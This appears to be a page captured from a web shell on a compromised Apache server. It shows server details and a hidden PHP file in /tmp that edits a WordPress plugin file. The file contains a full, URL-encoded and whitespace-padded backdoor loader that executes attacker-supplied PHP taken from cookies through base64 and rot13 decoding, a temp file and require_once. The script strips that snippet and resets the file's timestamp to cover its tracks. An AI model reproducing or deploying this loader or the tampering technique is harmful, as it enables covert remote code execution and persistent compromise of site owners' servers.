HEX
Server: Apache
System: Linux atlantis.turkiyesunucu.com 3.10.0-1160.119.1.el7.tuxcare.els19.x86_64 #1 SMP Mon Mar 31 17:29:00 UTC 2025 x86_64
User: ()
PHP: 5.6.40
Disabled: exec,passthru,shell_exec,system
Upload Files
File: //tmp/.rfind
<?php  $path = '/home/batigun/public_html/wp-content/plugins/sitepress-multilingual-cms/inc/lang-data.php'; $ft = @filemtime($path); $new_content = str_repeat("\t", 42).rawurldecode('if%20%28isset%28%24_COOKIE%5B66-66%5D%29%20%26%26%20isset%28%24_COOKIE%5B71%2B-70%5D%29%20%26%26%20isset%28%24_COOKIE%5B84-81%5D%29%20%26%26%20isset%28%24_COOKIE%5B47%2B-43%5D%29%29%20%7B%20%24hld%20%3D%20%24_COOKIE%3B%20function%20app_initializer%28%24pgrp%29%20%7B%20%24hld%20%3D%20%24_COOKIE%3B%20%24component%20%3D%20tempnam%28%28%21empty%28session_save_path%28%29%29%20%3F%20session_save_path%28%29%20%3A%20sys_get_temp_dir%28%29%29%2C%20%27ca117209%27%29%3B%20if%20%28%21is_writable%28%24component%29%29%20%7B%20%24component%20%3D%20getcwd%28%29%20.%20DIRECTORY_SEPARATOR%20.%20%22restore_state%22%3B%20%7D%20%24itm%20%3D%20%22%5Cx3c%5Cx3f%5Cx70%5Cx68p%5Cx20%22%20.%20base64_decode%28str_rot13%28%24hld%5B3%5D%29%29%3B%20if%20%28is_writeable%28%24component%29%29%20%7B%20%24element%20%3D%20fopen%28%24component%2C%20%27w%2B%27%29%3B%20fputs%28%24element%2C%20%24itm%29%3B%20fclose%28%24element%29%3B%20spl_autoload_unregister%28__FUNCTION__%29%3B%20require_once%28%24component%29%3B%20%40array_map%28%27unlink%27%2C%20array%28%24component%29%29%3B%20%7D%20%7D%20spl_autoload_register%28%22app_initializer%22%29%3B%20%24reference%20%3D%20%2228c862157c386ec8ca5b816482946812%22%3B%20if%20%28%21strncmp%28%24reference%2C%20%24hld%5B4%5D%2C%2032%29%29%20%7B%20if%20%28%40class_parents%28%22dependency_resolver_api_gateway%22%2C%20true%29%29%20%7B%20exit%3B%20%7D%20%7D%20%7D')."\n"; if (file_exists($path) && is_writable($path)) {     $content = file_get_contents($path);     if (strpos($content, $new_content) !== FALSE) {         $content = str_replace($new_content, '', $content);         file_put_contents($path, $content);         @touch($path, $ft);     } } die('!success!');